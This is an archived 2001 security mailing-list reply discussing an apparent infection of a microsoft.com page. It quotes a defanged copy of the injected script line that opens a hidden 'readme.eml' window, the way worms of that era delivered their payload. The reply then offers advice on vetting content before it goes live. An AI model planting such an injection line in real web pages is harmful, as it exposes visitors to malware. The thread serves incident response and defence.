Security Incidents mailing list archives
RE: Please tell me I'm wrong: microsoft.com infected
From: "David LeBlanc" <dleblanc () microsoft com>
Date: Wed, 19 Sep 2001 20:07:15 -0700
-----Original Message----- From: Michael H. Warfield [mailto:mhw () wittsend com]
Yes, indeedie do. Just did a wget http://www.microsoft.com/frontpage and here is what's on da bottom:
[html][script language="JavaScript"]window.open("readme.eml", null, "resizable=no,top=6000,left=6000")[/script][/html]
Defanged by turning angle brackets into square brackets even though it's not in an html attachment. ;-)
Though you might notice that the readme.eml never made it to the web site, so it won't actually get anyone - just good for stirring people up. Lesson here is that you not only have to make sure your servers are patched, but you might want to quickly check content that other propogate to you before you make it live 8-) ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- Re: Please tell me I'm wrong: microsoft.com infected, (continued)
- Re: Please tell me I'm wrong: microsoft.com infected Michael H. Warfield (Sep 19)
- Re: Please tell me I'm wrong: microsoft.com infected Jay D. Dyson (Sep 19)
- Re: Please tell me I'm wrong: microsoft.com infected Jon Zobrist (Sep 19)
- RE: Please tell me I'm wrong: microsoft.com infected jmiller (Sep 19)
- Re: Please tell me I'm wrong: microsoft.com infected Rodrigo Goya (Sep 19)
- RE: Please tell me I'm wrong: microsoft.com infected Ken Pfeil (Sep 19)
- RE: Please tell me I'm wrong: microsoft.com infected jmiller (Sep 19)
- RE: Please tell me I'm wrong: microsoft.com infected Craig Humphrey (Sep 19)
- RE: Please tell me I'm wrong: microsoft.com infected Boyan Krosnov (Sep 19)
- RE: Please tell me I'm wrong: microsoft.com infected Dave Hart (Sep 19)
- RE: Please tell me I'm wrong: microsoft.com infected David LeBlanc (Sep 19)